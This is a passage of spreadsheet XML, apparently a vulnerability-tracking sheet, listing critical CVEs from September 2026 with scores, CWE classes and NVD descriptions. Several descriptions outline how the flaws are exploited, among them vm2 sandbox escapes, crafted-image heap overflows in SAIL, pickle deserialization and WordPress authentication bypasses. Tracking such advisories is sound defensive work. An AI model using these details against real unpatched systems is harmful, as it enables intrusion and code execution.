      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54626</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>SAIL is a cross-platform library for loading and saving images with support for animation, metadata, and ICC profiles. In 0.9.10 and earlier, the TGA_INDEXED_RLE path selected by image_type == 9 allocates an image buffer using the one-byte-per-pixel SAIL_PIXEL_FORMAT_BPP8_INDEXED format returned by tga_private_sail_pixel_format() in src/sail-codecs/tga/helpers.c, while sail_codec_load_frame_v8_tga() in src/sail-codecs/tga/tga.c derives a two-to-four-byte pixel_size from an attacker-controlled header bpp value from 9 through 32. Loading a crafted color-mapped run-length-encoded TGA through sail_load_from_file() or sail_load_from_memory() therefore writes attacker-controlled bytes beyond the heap pixel buffer. The pixel-count clamp added for CVE-2026-40494 does not constrain the per-pixel write width, so this issue is an incomplete fix of that vulnerability and can cause heap corruption, a reliable crash, or potential code execution. This issue is fixed in version 1.0.0.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54626</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54627</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>SAIL is a cross-platform library for loading and saving images with support for animation, metadata, and ICC profiles. In 0.9.10 and earlier, psd_private_sail_pixel_format() in src/sail-codecs/psd/helpers.c resolves a one-channel PSD in Bitmap color mode to SAIL_PIXEL_FORMAT_BPP1_INDEXED without requiring the file depth to be one, so the pixel buffer uses one-bit rows while sail_codec_load_frame_v8_psd() in src/sail-codecs/psd/psd.c accepts depth == 8 and writes one attacker-controlled byte per pixel. Loading a crafted PSD through sail_load_from_file() or sail_load_from_memory() therefore writes beyond each heap row, causing memory corruption, a reliable crash, or potential code execution. This mode/depth mismatch is distinct from GHSA-rcqx-gc76-r9mv and GHSA-wcj8-hxxf-pq2c. This issue is fixed in version 1.0.0.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54627</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62101</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr"/>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Authentication in EduAdmin Booking &lt;= 5.4.2 versions.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62101</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62108</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated Broken Authentication in Headless Single Sign On &lt;= 1.7.0 versions.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62108</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86707</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>The Private Feed Key WordPress plugin through 0.1 does not verify that the key used to authenticate a feed request is one it issued, matching any stored user metadata value instead, which allows unauthenticated attackers to log in as any user, including administrators.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86707</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86709</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>The Pressengine WordPress plugin through 1.0 does not stop its login handler from issuing a session when authentication fails, allowing unauthenticated attackers to log in as any user, including administrators.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86709</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86710</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr"/>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>The Login with QR WordPress plugin through 1.0.0 does not verify that the code used to log a user in is one it issued, matching any stored user metadata value instead, which allows unauthenticated attackers to log in as any user, including administrators.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86710</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87796</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G32" s="5" t="inlineStr"/>
      <c r="H32" s="5" t="inlineStr"/>
      <c r="I32" s="5" t="inlineStr"/>
      <c r="J32" s="5" t="inlineStr"/>
      <c r="K32" s="5" t="inlineStr"/>
      <c r="L32" s="5" t="inlineStr"/>
      <c r="M32" s="5" t="inlineStr"/>
      <c r="N32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O32" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P32" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q32" s="5" t="inlineStr"/>
      <c r="R32" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S32" s="5" t="inlineStr">
        <is>
          <t>The Multi Uploader for Gravity Forms plugin for WordPress is vulnerable to Arbitrary File Upload in all versions up to, and including, 1.1.9 via the move_file function. This is due to insufficient file type validation during chunked upload handling. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.</t>
        </is>
      </c>
      <c r="T32" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87796</t>
        </is>
      </c>
    </row>
    <row r="33">
      <c r="A33" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B33" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C33" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90822</t>
        </is>
      </c>
      <c r="D33" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E33" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F33" s="5" t="inlineStr">
        <is>
          <t>contact@securifera.com</t>
        </is>
      </c>
      <c r="G33" s="5" t="inlineStr"/>
      <c r="H33" s="5" t="inlineStr"/>
      <c r="I33" s="5" t="inlineStr"/>
      <c r="J33" s="5" t="inlineStr"/>
      <c r="K33" s="5" t="inlineStr"/>
      <c r="L33" s="5" t="inlineStr"/>
      <c r="M33" s="5" t="inlineStr"/>
      <c r="N33" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O33" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P33" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q33" s="5" t="inlineStr"/>
      <c r="R33" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S33" s="5" t="inlineStr">
        <is>
          <t>FatPipe MPVPN, WARP, and IPVPN appliances running the end-of-life firmware version 10.1.2r60p100 contain an OS command injection vulnerability in the xtremed daemon. An unauthenticated remote attacker with access to the affected management interface can submit crafted input to the AuthFormServlet endpoint, causing authentication data to be processed by a shell and allowing arbitrary commands to execute as root.
The affected management interface is disabled by default and must be affirmatively enabled by the customer before the endpoint becomes reachable. FatPipe recommends restricting management access to trusted administrative networks and using WAN access control lists to limit access to trusted sources.
Customers running the affected end-of-life firmware can contact FatPipe Support for help confirming their firmware version and upgrading to a current supported release at https://www.fatpipeinc.com/support/support, support@fatpipeinc.com, or +1 800-724-8521 (option 3).</t>
        </is>
      </c>
      <c r="T33" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90822</t>
        </is>
      </c>
    </row>
    <row r="34">
      <c r="A34" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B34" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C34" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90823</t>
        </is>
      </c>
      <c r="D34" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E34" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F34" s="5" t="inlineStr">
        <is>
          <t>contact@securifera.com</t>
        </is>
      </c>
      <c r="G34" s="5" t="inlineStr"/>
      <c r="H34" s="5" t="inlineStr"/>
      <c r="I34" s="5" t="inlineStr"/>
      <c r="J34" s="5" t="inlineStr"/>
      <c r="K34" s="5" t="inlineStr"/>
      <c r="L34" s="5" t="inlineStr"/>
      <c r="M34" s="5" t="inlineStr"/>
      <c r="N34" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O34" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P34" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q34" s="5" t="inlineStr"/>
      <c r="R34" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="S34" s="5" t="inlineStr">
        <is>
          <t>FatPipe MPVPN, WARP, and IPVPN appliances running the end-of-life firmware version 10.1.2r60p100 contain a stack-based buffer overflow in /usr/sbin/auth_user_pass. An unauthenticated remote attacker with access to the affected management interface can submit a crafted authentication request that reaches an unchecked copy into a fixed-size stack buffer, potentially allowing arbitrary code execution as root.
The affected management interface is disabled by default and must be affirmatively enabled by the customer before the endpoint becomes reachable. FatPipe recommends restricting management access to trusted administrative networks and using WAN access control lists to limit access to trusted sources.
Customers running the affected end-of-life firmware can contact FatPipe Support for help confirming their firmware version and upgrading to a current supported release at https://www.fatpipeinc.com/support/support, support@fatpipeinc.com, or +1 800-724-8521 (option 3).</t>
        </is>
      </c>
      <c r="T34" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90823</t>
        </is>
      </c>
    </row>
    <row r="35">
      <c r="A35" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B35" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C35" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92944</t>
        </is>
      </c>
      <c r="D35" s="5" t="n">
        <v>9.800000000000001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2026-09-17</t>
        </is>
      </c>
      <c r="P35" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q35" s="5" t="inlineStr"/>
      <c r="R35" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S35" s="5" t="inlineStr">
        <is>
          <t>vm2 versions 3.10.2 through 3.11.6 contain a sandbox escape vulnerability on Node.js 26 where Promise.prototype.finally() bypasses vm2's wrapper protections due to a stale PromiseThenLookupChain protector in V8 14.6. Attackers can exploit this by creating an async function that returns a Promise with an attacker-controlled constructor Symbol.species, allowing them to reach the host Function constructor and process object for arbitrary code execution.</t>
        </is>
      </c>
      <c r="T35" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92944</t>
        </is>
      </c>
    </row>
    <row r="36">
      <c r="A36" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B36" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C36" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54053</t>
        </is>
      </c>
      <c r="D36" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E36" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F36" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G36" s="5" t="inlineStr"/>
      <c r="H36" s="5" t="inlineStr"/>
      <c r="I36" s="5" t="inlineStr"/>
      <c r="J36" s="5" t="inlineStr"/>
      <c r="K36" s="5" t="inlineStr"/>
      <c r="L36" s="5" t="inlineStr"/>
      <c r="M36" s="5" t="inlineStr"/>
      <c r="N36" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O36" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P36" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q36" s="5" t="inlineStr"/>
      <c r="R36" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S36" s="5" t="inlineStr">
        <is>
          <t>Many Notes is a Markdown note-taking web application designed for simplicity. Prior to 0.16.0, the ZIP vault import implemented in app/Actions/ProcessImportedVault.php accepts archive filenames containing parent-directory traversal segments. An authenticated user can write arbitrary files outside the importing user's vault and into other users' vaults, including overwriting existing files. Disguised SVG content can be placed in another user's vault and execute stored cross-site scripting when the victim opens that vault. This issue is fixed in version 0.16.0.</t>
        </is>
      </c>
      <c r="T36" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54053</t>
        </is>
      </c>
    </row>
    <row r="37">
      <c r="A37" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B37" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C37" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54752</t>
        </is>
      </c>
      <c r="D37" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E37" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F37" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G37" s="5" t="inlineStr"/>
      <c r="H37" s="5" t="inlineStr"/>
      <c r="I37" s="5" t="inlineStr"/>
      <c r="J37" s="5" t="inlineStr"/>
      <c r="K37" s="5" t="inlineStr"/>
      <c r="L37" s="5" t="inlineStr"/>
      <c r="M37" s="5" t="inlineStr"/>
      <c r="N37" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O37" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P37" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q37" s="5" t="inlineStr"/>
      <c r="R37" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-829</t>
        </is>
      </c>
      <c r="S37" s="5" t="inlineStr">
        <is>
          <t>NetBox Device Type Library is a collection of community-sourced device type definitions for import into NetBox. The validation test harness can deserialize pull-request-controlled tracked pickle cache files through pickle.load in the read_pickle_data function in tests/pickle_operations.py. An unauthenticated contributor can change USE_LOCAL_KNOWN_SLUGS in tests/test_configuration.py and supply a crafted tests/known-modules.pickle or tests/known-racks.pickle file that tests/definitions_test.py loads when pytest runs. Deserialization invokes attacker-controlled object reduction behavior, allowing arbitrary code execution in the GitHub Actions runner or in a maintainer process that runs the tests, with the confidentiality, integrity, and availability of reachable resources at risk. This vulnerability is fixed with commit 1c6f7e2b93589b965318c6e67ac3504831f0e71e.</t>
        </is>
      </c>
      <c r="T37" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54752</t>
        </is>
      </c>
    </row>
    <row r="38">
      <c r="A38" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B38" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C38" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87701</t>
        </is>
      </c>
      <c r="D38" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="E38" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G38" s="5" t="inlineStr"/>
      <c r="H38" s="5" t="inlineStr"/>
      <c r="I38" s="5" t="inlineStr"/>
      <c r="J38" s="5" t="inlineStr"/>
      <c r="K38" s="5" t="inlineStr"/>
      <c r="L38" s="5" t="inlineStr"/>
      <c r="M38" s="5" t="inlineStr"/>
      <c r="N38" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O38" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P38" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q38" s="5" t="inlineStr"/>
      <c r="R38" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="S38" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements in output used by a downstream component ('injection') in Azure Cosmos DB allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="T38" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87701</t>
        </is>
      </c>
    </row>
    <row r="39">
      <c r="A39" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B39" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C39" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92934</t>
        </is>
      </c>
      <c r="D39" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E39" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F39" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G39" s="5" t="inlineStr"/>
      <c r="H39" s="5" t="inlineStr"/>
      <c r="I39" s="5" t="inlineStr"/>
      <c r="J39" s="5" t="inlineStr"/>
      <c r="K39" s="5" t="inlineStr"/>
      <c r="L39" s="5" t="inlineStr"/>
      <c r="M39" s="5" t="inlineStr"/>
      <c r="N39" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O39" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P39" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q39" s="5" t="inlineStr"/>
      <c r="R39" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S39" s="5" t="inlineStr">
        <is>
          <t>vm2 before 3.11.8 contains an incomplete fix for Error.cause sanitization that allows sandbox escape when revisited host-wrapped AggregateError objects are caught within a single exception handler traversal. Attackers can exploit cycle detection bypass in handleException to access unsanitized host proxies embedded in the errors array, enabling full remote code execution and process information disclosure from the sandbox.</t>
        </is>
      </c>
      <c r="T39" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92934</t>
        </is>
      </c>
    </row>
    <row r="40">
      <c r="A40" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B40" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C40" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92935</t>
        </is>
      </c>
      <c r="D40" s="5" t="n">
        <v>9.5</v>
      </c>
      <c r="E40" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F40" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G40" s="5" t="inlineStr"/>
      <c r="H40" s="5" t="inlineStr"/>
      <c r="I40" s="5" t="inlineStr"/>
      <c r="J40" s="5" t="inlineStr"/>
      <c r="K40" s="5" t="inlineStr"/>
      <c r="L40" s="5" t="inlineStr"/>
      <c r="M40" s="5" t="inlineStr"/>
      <c r="N40" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O40" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P40" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q40" s="5" t="inlineStr"/>
      <c r="R40" s="5" t="inlineStr">
        <is>
          <t>CWE-913</t>
        </is>
      </c>
      <c r="S40" s="5" t="inlineStr">
        <is>
